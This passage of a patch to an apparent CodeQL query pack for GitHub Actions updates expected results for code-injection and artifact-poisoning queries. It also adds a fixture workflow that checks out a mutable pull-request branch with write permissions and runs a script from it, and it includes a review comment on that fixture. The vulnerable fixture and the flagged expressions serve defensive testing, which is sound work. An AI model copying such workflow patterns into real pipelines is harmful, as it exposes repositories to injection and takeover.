.github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref new file mode 100644 index 00000000000..9af8ec0f9ab --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected similarity index 74% rename from ql/test/query-tests/Security/CWE-094/CodeInjection.expected rename to ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e47c6dd340c..298c4ce75a4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -9,8 +9,6 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | 
@@ -46,6 +44,8 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | 
@@ -77,6 +77,10 @@ edges | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -93,10 +97,6 @@ nodes | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | 
@@ -201,6 +201,10 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -256,8 +260,31 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref new file mode 100644 index 00000000000..f7ce5674994 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref deleted file mode 100644 index fbd758b6bd6..00000000000 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.qlref +++ /dev/null 
@@ -1 +0,0 @@
-Security/CWE-094/PrivilegedCodeInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml
new file mode 100644
index 00000000000..0913ac8bbcf
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml
@@ -0,0 +1,21 @@
+name: Actor
+
+on: pull_request
+
+permissions:
+ contents: write
+
+jobs:
+ template-oss:
+ name: test
+ if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]'
+ runs-on: ubuntu-latest
+ defaults:
+ run:
+ shell: bash
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: |
+ ./cmd
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref
deleted file mode 100644
index 21d37e957a1..00000000000
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref
+++ /dev/null
@@ -1,2 +0,0 @@
-Security/CWE-829/ArtifactPoisoning.ql
-
diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
similarity index 73%
rename from ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected
rename to ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
index 2819bf62fdf..a792da27900 100644
--- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
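Review bot: The new `actor.yml` fixture has no comment stating which construct the CWE-367 query is expected to report, so a reader cannot tell whether the target is the `github.actor == 'dependabot[bot]'` condition, the checkout of the mutable `github.event.pull_request.head.ref`, or the two together. I would add a header comment above `jobs:` such as `# Fixture: job gated on github.actor, then checks out a mutable PR branch ref and runs ./cmd from it`. The trigger is `pull_request`; if the query is meant to cover only privileged triggers (presumably `pull_request_target`, which I cannot confirm from this hunk), the comment should also say whether this file is a positive or a negative case. A companion fixture pinning `ref: ${{ github.event.pull_request.head.sha }}` would show what the query is expected not to flag; no `.expected` or `.qlref` for CWE-367 is visible in this part of the patch.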
@@ -41,16 +41,16 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | -| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 